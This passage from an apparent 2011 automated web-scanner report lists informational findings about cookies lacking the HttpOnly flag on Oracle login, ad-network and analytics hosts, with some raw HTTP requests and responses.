The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.109. https://login.oracle.com/oam/server/sso/auth_cred_submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/oam/server/sso/auth_cred_submit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:16:28 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.110. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/pls/orasso/orasso.wwsso_app_admin.ls_login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.111. http://m1215.ic-live.com/522/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m1215.ic-live.com
Path:	/522/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:44 GMT; Path=/
pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:44 GMT; Path=/
sid1215=1315327545U3aHt51RXPi099; Domain=.ic-live.com; Path=/
Coyote-2-a210828=a210872:0; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.112. http://m1460.ic-live.com/586/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m1460.ic-live.com
Path:	/586/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:40 GMT; Path=/
pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:40 GMT; Path=/
sid1460=1315327540EFWgV8Bzct0q99; Domain=.ic-live.com; Path=/
Coyote-2-a210828=a210874:0; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:40 GMT; Path=/
Set-Cookie: pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:40 GMT; Path=/
Set-Cookie: sid1460=1315327540EFWgV8Bzct0q99; Domain=.ic-live.com; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT"
Location: http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google
Date: Tue, 06 Sep 2011 16:45:40 GMT
Set-Cookie: Coyote-2-a210828=a210874:0; path=/
Content-Length: 0

13.113. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netsuite.tt.omtrdc.net
Path:	/m2/netsuite/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mboxPC=1315341135013-154927.19; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 20-Sep-2011 15:32:28 GMT; Path=/m2/netsuite

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40 HTTP/1.1
Host: netsuite.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

13.114. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc12059.247realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011R0ynx; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.115. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6451/11953/20435-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=9844^2&11953^4; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61374; path=/; domain=.rubiconproject.com
csi15=2553663.js^1^1315321025^1315321025&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:57:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6451/11953/20435-15.js?cb=0.7766812939662486&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=9844^2&11953^2; csi15=1295156.js^2^1315320939^1315320950&638177.js^2^1315313132^1315313451

Response

13.116. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6451/11953/20435-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=9844^2&11953^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61338; path=/; domain=.rubiconproject.com
csi2=1295153.js^2^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; expires=Tue, 13-Sep-2011 14:57:41 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6451/11953/20435-2.js?cb=0.2368586107622832&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6451/11953; ses15=9844^2&11953^5; csi15=2553663.js^2^1315321038^1315321048&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

13.117. http://optimized-by.rubiconproject.com/a/dk.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=9844^2&11953^7; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61255; path=/; domain=.rubiconproject.com
csi15=1295121.js^2^1315321144^1315321144&2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:59:04 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

13.118. http://optimized-by.rubiconproject.com/a/dk.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=6451/11953; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=9844^2&11953^10; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60243; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x13d7d2.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^10; csi15=1300434.js^1^1315322155^1315322155&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

13.119. http://oracle.112.2o7.net/b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracle.112.2o7.net
Path:	/b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|2733218E05162BCA-60000182E00125F7|cx7Emox60ikx60cnmx60|2733211C85012E40-60000109C00668A7|fx7Bhjeljfd|2733218685011339-40000104A014EEE0[CE]; Expires=Sun, 4 Sep 2016 15:58:25 GMT; Domain=oracle.112.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103?AQB=1&ndh=1&t=6%2F8%2F2011%2015%3A58%3A21%202%20300&ce=UTF-8&ns=oracle&pageName=oow2011%3Aen-us%3A%2Fcontact%2F&g=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fcontact%2Findex.html&r=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html&cc=USD&ch=Oracle%20OpenWorld%3A%202011&c20=D%3Dv20&v20=New&c24=D%3Dv24&v24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html&c26=D%3Dv26&v26=oow2011%3Aen&v36=Oracle%20OpenWorld%3A%202011&c38=D%3DpageName&c39=D%3DpageName&c50=D%3Ds_vi&v50=D%3Ds_vi&c51=ora_code%3A1.37%3AH23.3&h1=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fcontact%2Findex.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: oracle.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/contact/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi=[CS]v1|2733210E05159EC1-40000176A0000B4C|fx7Bhjeljfd|2733211C85012E40-60000109C00668AA|cx7Emox60ikx60cnmx60|2733211C85012E40-60000109C00668A7|x60x7Dnlcjx60x7Fjaxxx60x7Dck|2733218685011339-40000104A014EEE2[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:58:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fx7Bhjeljfd=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=oracle.112.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi=[CS]v1|2733218E05162BCA-60000182E00125F7|cx7Emox60ikx60cnmx60|2733211C85012E40-60000109C00668A7|fx7Bhjeljfd|2733218685011339-40000104A014EEE0[CE]; Expires=Sun, 4 Sep 2016 15:58:25 GMT; Domain=oracle.112.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:58:25 GMT
Last-Modified: Wed, 07 Sep 2011 15:58:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664321-4785-7DF25DAF"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www415
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.120. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211885011D66-6000010A20474AFC|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/
s_vi_fx7Bhjeljfd=[CS]v4|2733211885011D66-6000010A20474AFF|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/
s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|2733211885011D66-6000010A20474B01|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.121. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s_vi_cx7Emox60ikx60cnmx60=[CS]v4|27332187050132C6-400001166006E825|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/
s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/
s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|273321188501292D-6000010B004C6452|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.122. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/
s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.123. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/
s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.124. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211D05010D53-4000010EC0480BA8|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/
s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.125. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/
s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.126. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleuniversity.112.2o7.net
Path:	/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/
s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.127. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleuniversity.112.2o7.net
Path:	/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F40515867E-40000175C00034AB|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/
s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F40515867E-40000175C00034AE|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.128. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleuniversity.112.2o7.net
Path:	/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/
s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.129. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862 previous next

Summary

Severity:	Information
Confidence:	Certain
